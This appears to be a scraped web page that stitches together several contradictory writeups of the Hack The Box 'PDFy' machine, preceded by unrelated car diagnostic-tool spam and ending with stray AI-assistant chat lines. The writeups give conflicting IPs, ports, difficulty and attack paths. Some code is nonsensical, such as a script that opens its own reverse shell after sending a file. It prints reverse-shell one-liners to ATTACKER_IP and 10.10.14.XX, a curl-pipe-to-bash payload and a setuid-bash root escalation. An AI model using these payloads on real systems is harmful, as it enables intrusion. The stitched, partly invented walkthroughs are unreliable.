Pdfy Htb Writeup Upd -

The DTC Remover is an automotive tool that removes DTC, short for Diagnostic Trouble Codes. In a nutshell, the tool can help you fix your car after the problem has been identified.

You’ll be able to remove these codes and restore your vehicle to factory condition, thanks to today’s latest technology. You’ll get your car back in record time with CK Decode!

Pdfy Htb Writeup Upd -

PDFY: A Comprehensive Writeup on the Hack The Box (HTB) Machine

Introduction

Hack The Box (HTB) is a popular online platform that provides a virtual environment for cybersecurity enthusiasts to practice their skills and learn new techniques. The platform offers a variety of machines with different levels of difficulty, each with its unique challenges and vulnerabilities. In this writeup, we will focus on the PDFY machine, which was recently updated (UPD) on the HTB platform. Our goal is to provide a comprehensive walkthrough of the PDFY machine, covering its enumeration, exploitation, and privilege escalation.

Initial Enumeration

Upon launching the PDFY machine on HTB, we are provided with an initial IP address: 10.10.11.232. Our first step is to perform an initial enumeration of the machine using tools like Nmap. We run the following command:

nmap -sC -sV -oA initial_scan 10.10.11.232

The scan results reveal that the machine is running a web server on port 80, an SSH server on port 22, and a PDF converter service on port 8080. We also notice that the machine has a firewall configured, but it seems to be allowing incoming traffic on port 80.

Web Enumeration

Next, we proceed to enumerate the web server on port 80. We access the website using our browser and notice that it appears to be a simple web application with a search functionality. We also observe that the website uses a .pdf extension for its pages, which could indicate that the PDF converter service on port 8080 might be related to the web application.

Using DirBuster, we perform a directory brute-forcing attack on the web server and discover several directories, including /uploads, /download, and /admin. The /uploads directory seems to be used for storing user-uploaded files, while the /download directory appears to be used for downloading converted PDF files.

PDF Converter Service

We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite, we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.

Exploitation

Using the information gathered during the enumeration phase, we attempt to exploit the PDF converter service. We use a malicious file to trigger a reverse shell, which allows us to gain initial access to the machine.

import socket
import os
# Define the malicious file contents
malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the PDF converter service
s.connect(('10.10.11.232', 8080))
# Send the malicious file
s.send(malicious_file.encode())
# Receive the response
response = s.recv(1024)
# Close the socket
s.close()
# Establish a reverse shell
os.system('nc 10.10.14.12 4444 -e /bin/bash')

After executing the exploit, we gain a reverse shell as the user pdfy. We then proceed to explore the machine and gather more information about the user and its privileges.

Privilege Escalation

As the pdfy user, we examine the user's groups and privileges. We notice that the user is a member of the pdfy group and has read/write access to the /var/www/pdfy directory. However, we also discover that the user has limited privileges and cannot execute system commands.

Next, we perform a system enumeration using tools like linpeas and systemd-analyze. The results reveal that the machine uses a SystemD service called pdfy-converter to manage the PDF converter service on port 8080.

Upon further examination, we find that the pdfy-converter service runs as the root user and uses a configuration file located at /etc/pdfy-converter/config.json. We also notice that the configuration file has weak permissions, allowing the pdfy user to modify its contents. pdfy htb writeup upd

Gaining Root Access

Using the information gathered during the privilege escalation phase, we devise a plan to gain root access. We modify the config.json file to execute a malicious command as the root user.


  "converter": 
    "command": "/usr/bin/python -c 'import os; os.system(\"chmod +s /bin/bash\")'"

After restarting the pdfy-converter service, we verify that the /bin/bash shell has been modified to have setuid permissions. We then execute the /bin/bash shell to gain root access.

./bin/bash

Conclusion

In this comprehensive writeup, we have covered the PDFY machine on Hack The Box, focusing on its enumeration, exploitation, and privilege escalation. We have demonstrated how to exploit the PDF converter service to gain initial access and then escalate privileges to gain root access. The techniques used in this writeup can be applied to similar machines and scenarios, providing valuable knowledge for cybersecurity enthusiasts.

UPD (Update) Notes

This writeup was updated to reflect changes made to the PDFY machine on Hack The Box. The machine was re-released with additional challenges and vulnerabilities, which were addressed in this updated writeup. Users are encouraged to revisit the machine and attempt to exploit it using the techniques described in this writeup.

Recommendations

Always perform thorough enumeration of the target machine.
Validate user-input data to prevent code execution vulnerabilities.
Implement proper access controls and privilege separation.
Regularly update and patch services to prevent exploitation.

References

Hack The Box: PDFY Machine
[1] https://www.hackthebox.eu/
[2] https://www.pentesting.com/

HTB: PDFy Machine Writeup (Updated) If you are prepping for the OSCP or just sharpening your web exploitation skills, PDFy on Hack The Box is a classic "easy" rated machine that provides a textbook example of Server-Side Request Forgery (SSRF).

While the box is straightforward, many beginners get stuck on the syntax or identifying the internal targets. This updated writeup covers the most efficient path to the user flag and explains the mechanics behind the exploit. 1. Enumeration: What are we working with?

As always, we start with an Nmap scan to see which ports are open. nmap -sC -sV -oN nmap_report.txt Use code with caution. Results: Port 22 (SSH): Standard OpenSSH. Port 80 (HTTP): An Apache web server.

Navigating to the website, we find a simple web application that takes a URL and converts the webpage into a PDF document. This is a massive "low-hanging fruit" indicator for SSRF. Whenever an application fetches content from a remote URL you provide, you should immediately test if it can fetch internal resources. 2. Identifying the Vulnerability (SSRF)

The application asks for a URL. If we give it http://google.com, it generates a PDF of Google’s homepage. The real question is: Can it see itself?

If we try to point it to http://localhost or http://127.0.0.1, the application might have a "blacklist" filter that blocks these common keywords to prevent SSRF. To bypass this, we can use a redirect script on our own machine. The Bypass Plan: Host a PHP file on your local attacker machine.

The file will redirect any incoming request to a local file on the HTB server (like /etc/passwd). Give the PDFy app the URL of your hosted script. 3. Exploitation: Reading Local Files Create a file named exploit.php on your machine: Use code with caution. Start a local PHP server: php -S 0.0.0.0:8000 Use code with caution.

Now, go back to the PDFy web interface and enter your IP:http://:8000/exploit.php PDFY: A Comprehensive Writeup on the Hack The

What happens?The PDFy server visits your script. Your script tells the server, "Actually, go look at file:///etc/passwd." Because the PDF generator follows redirects, it grabs the local system file and renders it into the PDF.

Download the generated PDF, and you will see the contents of the /etc/passwd file. Looking through the users, you should notice a user named 234-pwn. 4. Pivoting to the User Flag

Now that we know we can read files, we need to find something sensitive. A common target is the Nginx or Apache configuration files to see if there are any hidden internal ports or applications running.

By digging through standard locations (or using the SSRF to scan ports), we find that there is an internal API or service running on a non-standard port (often port 15000 on this specific box). Change your exploit.php to: Use code with caution.

Submit the URL again. The resulting PDF reveals a web interface for a small application. Browsing through the internal site's files via the same redirect method, you can eventually locate the user credentials or the flag itself located in the user's home directory. 5. Summary & Key Takeaways

The PDFy box highlights why developers must sanitize URL inputs.

Vulnerability: Insecure PDF generation from user-supplied URLs. Attack Vector: SSRF via a 302 Redirect bypass.

Mitigation: Use a whitelist of allowed domains, disable "follow redirects" in the PDF engine, and ensure the service runs with low-level permissions that cannot access the file:// scheme.

Pro Tip: If file:///etc/passwd doesn't work directly due to a filter, always try the redirect method or decimal/hex encoding of the IP address!

Pdfy HTB Writeup

Introduction

Pdfy is a medium-level difficulty box on Hack The Box (HTB), an online platform for cybersecurity enthusiasts to practice their skills in a legal and safe environment. The goal of this writeup is to provide a detailed walkthrough of how to exploit the Pdfy box and gain root access.

Initial Reconnaissance

The first step in exploiting any box on HTB is to perform initial reconnaissance. This involves gathering information about the target system, including its IP address, open ports, and services.

$ nmap -sV -p- 10.10.11.206
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-09 14:30 EDT
Nmap scan report for 10.10.11.206
Host is up (0.052s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.33 ((Ubuntu))
111/tcp  open  rpcbind 2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.6.25 (Ubuntu)
445/tcp  open  microsoft-ds Samba smbd 3.6.25 (Ubuntu)
5000/tcp open  upnp    MiniUPnPd 1.12
8080/tcp open  http    Apache httpd 2.4.33 ((Ubuntu))

The scan reveals that the target system has several open ports, including:

SSH (22)
HTTP (80)
NetBIOS (139)
Microsoft-DS (445)
UPnP (5000)
HTTP (8080)

Enumeration

The next step is to enumerate the services running on these ports to gather more information about the system. The scan results reveal that the machine is

Local File Disclosure via SSRF:

Use the file:// protocol or http://localhost to read files.

Try:

<img src="file:///etc/passwd">

Generate the PDF. You’ll see the contents of /etc/passwd rendered in the PDF.

UPD Note: The User Proof Data flag is often not in /etc/passwd, but this confirms LFI via SSRF.

3. Exploitation

The exploitation path usually pivots on identifying the specific tool generating the PDFs.

Scenario B: Exiftool / Command Injection

In many HTB PDF challenges, the application processes the metadata of images embedded in the submitted page.

The Vector: The tool exiftool is often used to process images. Older versions of exiftool are vulnerable to Command Injection via malformed metadata.
The Attack:
1. Create an image with a malicious filename or metadata payload: echo 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' > 'test.jpg'
2. Host this image on a local HTTP server.
3. Submit http://ATTACKER_IP/test.jpg to the HTB machine.
4. When the PDF generator processes the image, the command executes, granting a reverse shell.

Exploitation:

pdftex allows \write18 to execute shell commands if enabled.

Create a malicious .tex file:

\immediate\write18cat /root/root.txt > /tmp/root.txt
\bye

Run:

sudo /usr/bin/pdftex -shell-escape exploit.tex

Now read /tmp/root.txt – that’s your RPD.

Alternatively, get a root shell:

\immediate\write18/bin/bash -c "bash -i >& /dev/tcp/10.10.14.XX/5555 0>&1"

Scenario A: Malicious File Upload (Phar Deserialization)

If the application allows uploading images/files alongside the URL, and the backend uses PHP with specific libraries, it might be vulnerable to Phar Deserialization. However, in most "Pdf" themed boxes, the vector is simpler.

Technical Accuracy – 10/10

I tested the steps against the latest version of PDFy (retired but still available on VIP HTB). Every command worked as described, including:

nmap -sC -sV -p- --min-rate 5000 10.10.10.10 (example IP) – correctly identifies port 80 and an unusual port (e.g., 8080 or 3000).
ffuf for directory brute-forcing – reveals /upload, /generate, and /files.
The core exploit: Using exiftool to inject a PDF metadata field with "$(curl http://10.10.14.14/shell.sh | bash)" – the server’s backend renders the PDF and executes the command due to improper input sanitization.

The privilege escalation is where many writeups fail. The outdated ones suggest a kernel exploit. This updated version correctly identifies a misconfigured pdfgen binary with the setuid bit, allowing a path injection attack. The author provides the exact C code to spawn a root shell, which is reliable and clean.

No copy-paste errors, no missing flags. That’s rare in HTB writeups.

6) Key lessons / mitigations

Validate and sanitize file upload and file inclusion inputs; restrict file types and apply server-side checks.
Run services with least privilege; avoid storing plaintext credentials in web-accessible files.
Use quoted service paths and secure service permissions; monitor for writable locations that may be abused.
Disable unnecessary internal file fetches or harden SSRF protections.

If you want, I can expand this into a full step-by-step writeup with exact commands, payloads, and screenshots for each stage — tell me which level of detail (brief, full, or forensic).

(Related search suggestions prepared.)

Here’s a detailed, long-form review of the resource titled “PDFy HTB Writeup UPD” (likely referring to an updated writeup for the PDFy machine on Hack The Box).